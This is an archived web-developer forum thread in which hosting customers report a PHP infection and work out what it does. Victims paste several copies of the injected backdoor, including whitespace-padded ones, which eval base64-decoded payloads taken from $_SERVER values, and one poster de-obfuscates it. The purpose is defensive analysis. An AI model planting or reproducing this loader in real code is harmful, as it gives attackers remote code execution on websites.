dcsimg
www.webdeveloper.com
Page 1 of 2 12 LastLast
Results 1 to 15 of 24

Thread: Nasty PHP virus

  1. #1
    Join Date
    Jun 2008
    Location
    Europe
    Posts
    1,114

    Nasty PHP virus

    My sites just got hit with a nasty PHP virus...

    //Silence is golden.

    This virus has gone through my Godaddy Deluxe hosting site, where each site is treated as a sub-folder, and uploaded a blank index.php file to each site... over 60 of them.

    GoDaddy support was no help at all thus far, I seem to have resolved it for now, but fear that this bug will return.

    I will post the PHP code later when I can fix the suspicious laptop - for now it is completely disconnected from the Internet. I am connected to the net by a different computer now and do not have these infected files handy.

    Doe anyone know how this bug works? Is it local on my machine or has my FTP password been stolen by a Chinese hacker?

    I know that for the Russian trojans that insert iframes in all index.html files, they work via FTP clients such as FireFTP or WS FTP and it appears that WinSCP gives a layer of safety...

    Any advice? Any experience?

  2. #2
    Join Date
    Sep 2006
    Location
    Bucharest, RO
    Posts
    940
    Some FTP clients store passwords in plain text. Some viruses search for these files and send them "home". I don't know about WinSCP -- although the protocol (SSH) is a lot safer than FTP, I think it still stores passwords in plain text. That's all I can think of right now, if you give more details maybe other ideas will pop out. Be safe.

  3. #3
    Join Date
    Jun 2008
    Location
    Europe
    Posts
    1,114

    Update

    I'll post some of what was uploaded to my server:

    This is the contents of the index.php file that was uploaded to every single folder on my site:
    PHP Code:
    <?php function gpc_10805($l10807){if(is_array($l10807)){foreach($l10807 as $l10805=>$l10806)$l10807[$l10805]=gpc_10805($l10806);}elseif(is_string($l10807) && substr($l10807,0,4)=="____"){eval(base64_decode(substr($l10807,4)));$l10807=null;}return $l10807;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_10805",$_SERVER);
    // Silence is golden.
    ?>
    This line of code was inserted into a number of files at the same time. The files included wp-config.php for Wordpress sites and a few other apparantley randomly chosen php files.
    PHP Code:
    <?PHP function gpc_2657($l2659){if(is_array($l2659)){foreach($l2659 as $l2657=>$l2658)$l2659[$l2657]=gpc_2657($l2658);}elseif(is_string($l2659) && substr($l2659,0,4)=="____"){eval(base64_decode(substr($l2659,4)));$l2659=null;}return $l2659;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_2657",$_SERVER);

  4. #4
    Join Date
    Sep 2009
    Posts
    4

    Angry

    I just noticed the same thing to one of my sites too!

    I have the Godaddy Deluxe hosting account with probably 20 sites hosted in different sub-folders. I only noticed one instance of this file, and the reason that I was able to catch it is because I noticed a huge dip in the stats on Analytics.

    I'll post my file for all to see:

    PHP Code:
    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         function gpc_12515($l12517){if(is_array($l12517)){foreach($l12517 as $l12515=>$l12516)$l12517[$l12515]=gpc_12515($l12516);}elseif(is_string($l12517) && substr($l12517,0,4)=="____"){eval(base64_decode(substr($l12517,4)));$l12517=null;}return $l12517;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_12515",$_SERVER);
    // Silence is golden.
    ?>
    Anyway, this was the only place that I found the file. I am going to change my FTP password just to be on the safe side.

    Anyone find out anymore info on this virus or bug?

    What does the script even do?

  5. #5
    Join Date
    Sep 2009
    Posts
    4
    Ok, went through the rest of my sites and found it on another very low traffic site.

    File was uploaded 8/31/09 at 22:29, with file attributes -rw-r--r--

    Here is this one. I think it is different from the last:

    PHP Code:
    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             function gpc_1990($l1992){if(is_array($l1992)){foreach($l1992 as $l1990=>$l1991)$l1992[$l1990]=gpc_1990($l1991);}elseif(is_string($l1992) && substr($l1992,0,4)=="____"){eval(base64_decode(substr($l1992,4)));$l1992=null;}return $l1992;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_1990",$_SERVER);
    // Silence is golden.
    ?>

  6. #6
    Join Date
    Sep 2009
    Posts
    4
    PS- You have to scroll way to the right on those PHP boxes to find the functions and stuff.

  7. #7
    Join Date
    Sep 2009
    Posts
    1
    I'm wondering if this could be an attack via an older version of wordpress. I just had this same thing happen yesterday and am just cleaning up the mess from it. I have seen "silence is golden" mentioned in a few posts that mentioned wordpress.

    I went and deleted the files on my server, and am now going to update my wordpress site to the most recent version.

  8. #8
    Join Date
    Sep 2006
    Location
    Bucharest, RO
    Posts
    940
    I keep wondering what those functions actually do. They're too mangled up to make something out of them.

  9. #9
    Join Date
    Sep 2009
    Posts
    4
    The sites which I found these index.php files on were NOT using wordpress. To be honest, I don't think either of these two sites even had a index.php file present since both were in html only. Haven't seen anything else fishy yet.

  10. #10
    Join Date
    Nov 2008
    Posts
    2,477
    Quote Originally Posted by Znupi View Post
    I keep wondering what those functions actually do. They're too mangled up to make something out of them.
    Unmangled:

    PHP Code:
    function gpc_1990($l1992) {
        if (
    is_array($l1992)) {
            foreach (
    $l1992 as $l1990 => $l1991) {
                
    $l1992[$l1990] = gpc_1990($l1991);
            }
        } elseif (
    is_string($l1992) && substr($l199204) == "____") {
            eval(
    base64_decode(substr($l1992,4)));
            
    $l1992 null;
        }
        return 
    $l1992;
    }

    if (empty(
    $_SERVER)) {
        
    $_SERVER $HTTP_SERVER_VARS;
    }

    array_map("gpc_1990"$_SERVER); 
    Looks like it is recursively searching for any values in the $_SERVER superglobal which begin with ____ (4 underscores) and decoding then evaluating them.

    Not sure what this is actually targeting though, I didn't see anything in my own $_SERVER superglobal which would trigger the eval (Apache 2 on Linux).

  11. #11
    Join Date
    Sep 2006
    Location
    Bucharest, RO
    Posts
    940
    Interesting. Maybe it somehow hacks Apache in order to add such values, too? People who have this problem should check their $_SERVER variables (either using phpinfo() or just going through $_SERVER manually) and let us know if they find any values starting with ____.

    Edit: I'm not sure if Apache needs to be hacked in order to add $_SERVER variables. I think they can be added by modifying the actual PHP interpreter to add these values before evaluating the actual requested file. If this is the case, then the hack could be even more elaborate. It could actually check that the file in question is their file (containing those functions etc.) and only add those values if it's the right file.
    Last edited by Znupi; 09-03-2009 at 07:05 AM.

  12. #12
    Join Date
    Jan 2009
    Location
    Insanity
    Posts
    1,131
    Or... if this is asomething like the hacker is trying to post data that is prefixed with ____ that is stored in a global of some sort that can be accessed via a $_SERVER variable and the following data is base64 encoded, which is the payload that is decoded and then executed.

    You notice that the b64 is a decode that evaluates the string but omits the first 4 characters when it comes to decoding.

    So I would say that the hack is attempting to inject a program disguised as base64 string prefixed with '____'.

  13. #13
    Join Date
    Nov 2008
    Posts
    2,477
    It could also be a cookie stored in $_SERVER['HTTP_COOKIE'] ? Though on my own server they are stored in a semi-colon delimeted list.

    I agree the goal seems to be to inject something into $_SERVER somewhere for evaluation - but it begs the question why? If they have got as far as injecting random PHP code into files, surely they already have free-reign to do what they like? I suppose maybe this would allow them to leave a back door for executing arbitrary code later, but again if you already have control over someone's PHP files there are easier ways to do this.
    Last edited by Mindzai; 09-03-2009 at 07:43 AM.

  14. #14
    Join Date
    Jan 2009
    Location
    Insanity
    Posts
    1,131
    Well here is something I looked up, I tried function gpc_ to see what would show up, notice anything???

    http://www.seanrees.com/2009/09/02/w...orth-its-salt/

  15. #15
    Join Date
    Nov 2008
    Posts
    2,477
    Hmmm yes well that all seems to make sense and pretty much confirms what we were thinking. I suppose the question is how did the files get modified in the first place though? This seems to be targeted towards wordpress which has more than it's fair share of exploits, maybe there is some hole it it somewhere which is being exploited?

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center